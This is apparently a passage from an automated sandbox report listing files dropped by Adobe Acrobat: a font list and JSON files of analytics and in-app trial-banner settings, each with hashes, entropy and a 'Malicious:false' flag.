                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PostScript document text
                                                                Category:dropped
                                                                Size (bytes):185099
                                                                Entropy (8bit):5.182478651346149
                                                                Encrypted:false
                                                                SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                Malicious:false
                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):295
                                                                Entropy (8bit):5.364532922436153
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXFOl72WsGiIPEeOF0YRDvqoAvJM3g98kUwPeUkwRe9:YvXKXFOzsdTeOxDvZGMbLUkee9
                                                                MD5:166D2E350BF626EDA77F79030071A547
                                                                SHA1:ECC87A3BE41F7BB2B5E2982BFCB09FE2A3FF51AE
                                                                SHA-256:793C2F3D102310693D338D95F19F894E2493D182112D40E7C123CED77B46C1E1
                                                                SHA-512:C20600636EDEDA9DE458BD9A5E0215185D602A3D92606BD2D056648DE418A8860231A3E823AFABA78FADF9F7B9859CAD20BE072BD3CA73AA4B28A41323FAC6FA
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):294
                                                                Entropy (8bit):5.296700224779261
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXFOl72WsGiIPEeOF0YRDvqoAvJfBoTfXpnrPeUkwRe9:YvXKXFOzsdTeOxDvZGWTfXcUkee9
                                                                MD5:CCE1012B8524F58504D46D9D7E0482CE
                                                                SHA1:FEB701D844E91F37A0817D5E00E1A36970C0DBE4
                                                                SHA-256:9DA6A151AD60FBC25E8908DB437C81C022F7D6F69237F41A7C897E72B6B789D5
                                                                SHA-512:E707A23481322826D57B21AA95EC41B033C880DFB72C940C36970AE851DBB4FAB81975A6F47CD0FF93E20430B0C32B3F5EE30D3CC86766A759A47A3E26EBD1CA
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):294
                                                                Entropy (8bit):5.274110487490036
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXFOl72WsGiIPEeOF0YRDvqoAvJfBD2G6UpnrPeUkwRe9:YvXKXFOzsdTeOxDvZGR22cUkee9
                                                                MD5:767C47B5AA2DDE40BD5F32A4A7C70064
                                                                SHA1:63121A19B09C73B3228F41487EEC2DFD8BC8013E
                                                                SHA-256:45DFE9458C5E5CF61E14AE40A7C8F6D40D9DFDD9086FD39BAA4731EBE6F0BCDC
                                                                SHA-512:89593AEEC80BA1417481A4AF7C1BF008F109C9C237F1FDB9C136AC3EB439314EC1458DFD5DC47AA0FBEA4296AA6E248F4E9E2162B408C9CC282258C34C85A073
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):285
                                                                Entropy (8bit):5.35145226194602
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXFOl72WsGiIPEeOF0YRDvqoAvJfPmwrPeUkwRe9:YvXKXFOzsdTeOxDvZGH56Ukee9
                                                                MD5:5261B740310B2ADEE4595CD6541DBF2F
                                                                SHA1:C151E0E0D0F63ADF059630BF2A8FB6692B7DE410
                                                                SHA-256:87B16F95C25D56ECE56F0E7F5792710A97B3432CB814F81E01361E4540BD3C06
                                                                SHA-512:23A24408A56583DEBF02FACB2AB5A012B7DA9CF3D394B14A06A72287B7B3D4431BF5011214A053769E78B5667895E70D6144C4CE9BD82BA93D16D6F8830E2955
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1055
                                                                Entropy (8bit):5.656976721302476
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6XIzmeOJ+pLgEscLf7nnl0RCmK8czOCCS2n:YvWe3hgGzaAh8cv/2
                                                                MD5:E7482BF809EA55CFC5A4F1F0490FA64C
                                                                SHA1:F351D8ACF7BA68C7088C3C1E6BA1A23479A28F7D
                                                                SHA-256:8FD995D4CE54B8910F1EB2C2C0B553FE1EC82D820FD72134B0857C285279E2F1
                                                                SHA-512:72F25D86319A836E5126C070C7F631EAED87D4C96E6132C3557D5F3E319AEF7670284B9BAB67B92984D5886F757F8DE1E141599E8816DD1501567E31359C9EDB
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"92038_285529ActionBlock_1","campaignId":92038,"containerId":"1","controlGroupId":"","treatmentId":"eb1a4bce-8215-46f1-b44c-154b21a85d60","variationId":"285529"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingScheme":tr
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1050
                                                                Entropy (8bit):5.648312924814998
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6XIzmeOJoVLgEF0c7sbnl0RCmK8czOCYHflEpwiVXn:YvWebFg6sGAh8cvYHWpw2
                                                                MD5:A3F51F969BEB6E53D21E34C66041AB7A
                                                                SHA1:CC12E5355F342E9ADFEAEFD6E785821FDE7C9211
                                                                SHA-256:9DA35F331CE14F3669CD884697C49CC4238B918D19F2B45F9D5AF7D27EB757C1
                                                                SHA-512:D6F9F22095C32761A6EF30095B4A84F232298AF23CC00B981E8E94C3EB3232EF78A2836C0E051FAFC75B16E6CD7ECC81988373A86C77D94ACC3ABAB2E7A6FC20
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):292
                                                                Entropy (8bit):5.288799023940877
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXFOl72WsGiIPEeOF0YRDvqoAvJfQ1rPeUkwRe9:YvXKXFOzsdTeOxDvZGY16Ukee9
                                                                MD5:33347616F00273354C9BAC42A3CD3F5B
                                                                SHA1:5E19222C77B7BBD9FA5CFAD3D6F5156DC935D49C
                                                                SHA-256:A33806D22F911A1A4C048BEB29E6D8AB3F6C3F6203C99CBBFDD6C8B5BAEDCD70
                                                                SHA-512:76D2B2BBCE15ED719ABB16CB1ECDF0239C10C0FD8BB8A1C9C9E36F0F3F92BCBAB6738D19206DCA7E6E9E9F58AF429361870F582BBE61CB63C6E3F4630B02962C
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1038
                                                                Entropy (8bit):5.648420777093732
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6XIzmeOJt2LgEF7cciAXs0nl0RCmK8czOCAPtciBXn:YvWeqogc8hAh8cvA1
                                                                MD5:96C1D97A42C5DC88E282AAF62D8322FC
                                                                SHA1:A4C8B47A32AD8639DB9F45021F14807AC94DF3DA
                                                                SHA-256:589C113328B3676FF269F24D43C01D7BF0890C64510B38429E29AE8D5B046CAF
                                                                SHA-512:0FA17BCD4B81FFCFE6FAA573CA3360114D9732C2449415E5979300F2AD04F472130F4450A91D312F07319C9C014774FBBE13E0694E22F4CD14F201ECEF1370DF
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1164
                                                                Entropy (8bit):5.700228676538335
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6XIzmeOJFKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5Xn:YvWe2EgqprtrS5OZjSlwTmAfSKZ
                                                                MD5:5A7C0D568BF7578C38A6838BE23E81D6
                                                                SHA1:AF01E2929A1C91E91F35D838EE813AB505A9EC46
                                                                SHA-256:C494A1A0F3BA938527BBFC65A12F04ED2320F4F041723A3028BE0C60C8F75795
                                                                SHA-512:3EA3A862E4313EF6422954FCCC5CBE03AEB53841126761B46F0FF8675A2AB0DE2BCCC8E853B58164BE04F3BEB3A8EF7FAB18895E7CDF71F054F787CCEE7272EF
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):289
                                                                Entropy (8bit):5.29291325724982
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXFOl72WsGiIPEeOF0YRDvqoAvJfYdPeUkwRe9:YvXKXFOzsdTeOxDvZGg8Ukee9
                                                                MD5:36963E74F12907BF9B2CE1CA941957EA
                                                                SHA1:08EE54C4F3072E80003A2D146CF4E2B8F6C6010E
                                                                SHA-256:BF761E840E03B894D5C4A867103681CE0C54FB966D4455C7AC8B958F93C2510A
                                                                SHA-512:10278E0E4DB1C70A5E8C8CA3192BFDEC40E9F6310A0FE4C54009D36B91EB281AF631F68F0FBA37D5A943B9F0A6C7696D96CEEAC87EF5901B9368BA98C2ECD01C
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1395
                                                                Entropy (8bit):5.773053028857159
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6XIzmeOJ4rLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNI:YvWe9HgDv3W2aYQfgB5OUupHrQ9FJO
                                                                MD5:36D192FEA5D64DCFE6CA40438D879846
                                                                SHA1:51C7D9F4CB8F6EB81320112C6BFBB5D650EA8A8B
                                                                SHA-256:EC94CB317DDB8274DD8E824CD054E936F5A056161223B8F273F4F7AACB7E69D6
                                                                SHA-512:C9289F0AB43E8736893E8245CF03B350E932693FB34DDBD4FF8452179C35AA6E5C0B91AC9D2EA29F0C651438F03FECE06987C81A82F3AB283166B9E8030BEAC4
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):291
                                                                Entropy (8bit):5.276509061059424
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXFOl72WsGiIPEeOF0YRDvqoAvJfbPtdPeUkwRe9:YvXKXFOzsdTeOxDvZGDV8Ukee9
                                                                MD5:9BA5F5279DFF3800752E86D167AA7076
                                                                SHA1:5E1A6D0B42AC3E9C2EFCDF3378DB056F4C97C65E
                                                                SHA-256:7522308A2B73D1AC5DB18E9B6D4D5B17D570C2DDAE498A57A48F4C82C4001332
                                                                SHA-512:BED8A5A3D60982D41EC27DF5264F9A5AA632E915CEF3AE236008E746BA55F298756F98265B8921EEA08ED2FA94711642106C160041100C3AF1951F0ACF153B0C
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):287
                                                                Entropy (8bit):5.281062422593009
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXFOl72WsGiIPEeOF0YRDvqoAvJf21rPeUkwRe9:YvXKXFOzsdTeOxDvZG+16Ukee9
                                                                MD5:C49FF6CE547CF1C39BAFB4EF4A30900B
                                                                SHA1:DF890503C1C5BB5603EFEFC978504E0D6D3CC44E
                                                                SHA-256:02D0B005714ADE17A7E1B5783CF23A1C87F5B7433249A7B30EA3A085B1620588
                                                                SHA-512:B62409272731388A6751343A9B4D74196BB59C0091BD0D5D7BD04054B6C096A0428A42DE9478AFA46F151E26B012F93517D7E8268C0553373986E672AD889367
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1026
                                                                Entropy (8bit):5.62710962931538
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6XIzmeOJiamXayLgE7cMCBNaqnl0RCmK8czOC/BS2n:YvWenBgACBOAh8cvM2
                                                                MD5:A46B257EB5D8EEEEB98D9D88F219324C
                                                                SHA1:96B4DBD76D87D3E8DDF2FFCD918D82ACEF434001
                                                                SHA-256:C0CE80DD0FEA00E571A456ECB9F1EB000A3F0F519D2CE3C13C350636F821BB4F
                                                                SHA-512:35F6DB054E371D5F5C4F9C13F7BA9709CF3A9E2F09DFB5222544AD38217A85C327E99AC6542E12133E5E3096F121EB696BF845473639C3EB176F9FCAA0126D1B
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"92038_285529ActionBlock_0","campaignId":92038,"containerId":"1","controlGroupId":"","treatmentId":"6291f52b-6cb0-4d31-bc46-37ce85e9eb25","variationId":"285529"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1751323379000,"s
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):286
                                                                Entropy (8bit):5.255834149524921
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXFOl72WsGiIPEeOF0YRDvqoAvJfshHHrPeUkwRe9:YvXKXFOzsdTeOxDvZGUUUkee9
                                                                MD5:D4791D47D45EBE2771188967BD52A93D
                                                                SHA1:CA4ED0F116717C9512890CEFE56CD82A1EA6EA84
                                                                SHA-256:89031556C051F6E659881509992E05001BDA0C8F74CEB7B1A05236F0266BD5A1
                                                                SHA-512:EB3AA276C4F1961F2D280E71547650DA9B33A57B01FD319FBAE4FC443A48A19C0DD5FFB41B3487DAB66D469EBE1188FDBF208646883DEFA7ED9F15FDF2242043
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):782
                                                                Entropy (8bit):5.371868543492864
                                                                Encrypted:false
                                                                SSDEEP:12:YvXKXFOzsdTeOxDvZGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhW8:Yv6XIzmeOJ1168CgEXX5kcIfANhR
                                                                MD5:28B8352FE9DC69658018540668F48C92
                                                                SHA1:CA152A68AEFC9230DD69B23E3C336FDC50618F54
                                                                SHA-256:9E3B6A9FF79249176BBA89F1F7EFD8BD56B6AB75D484A32594555D7557D8784D
                                                                SHA-512:5C3532241A0AD5C9B80D427404B6620F5D570FA721572984F468A18AA9B6A56E0CCCD0A055C73E8F3340267B5FEAE86667686EBDCA93BD7D51D53C166430D577
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"2ce3af0f-9da2-4d4f-b6f3-cd7c9b4e98cc","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1730055985334,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1729878445367}}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:data
                                                                Category:dropped
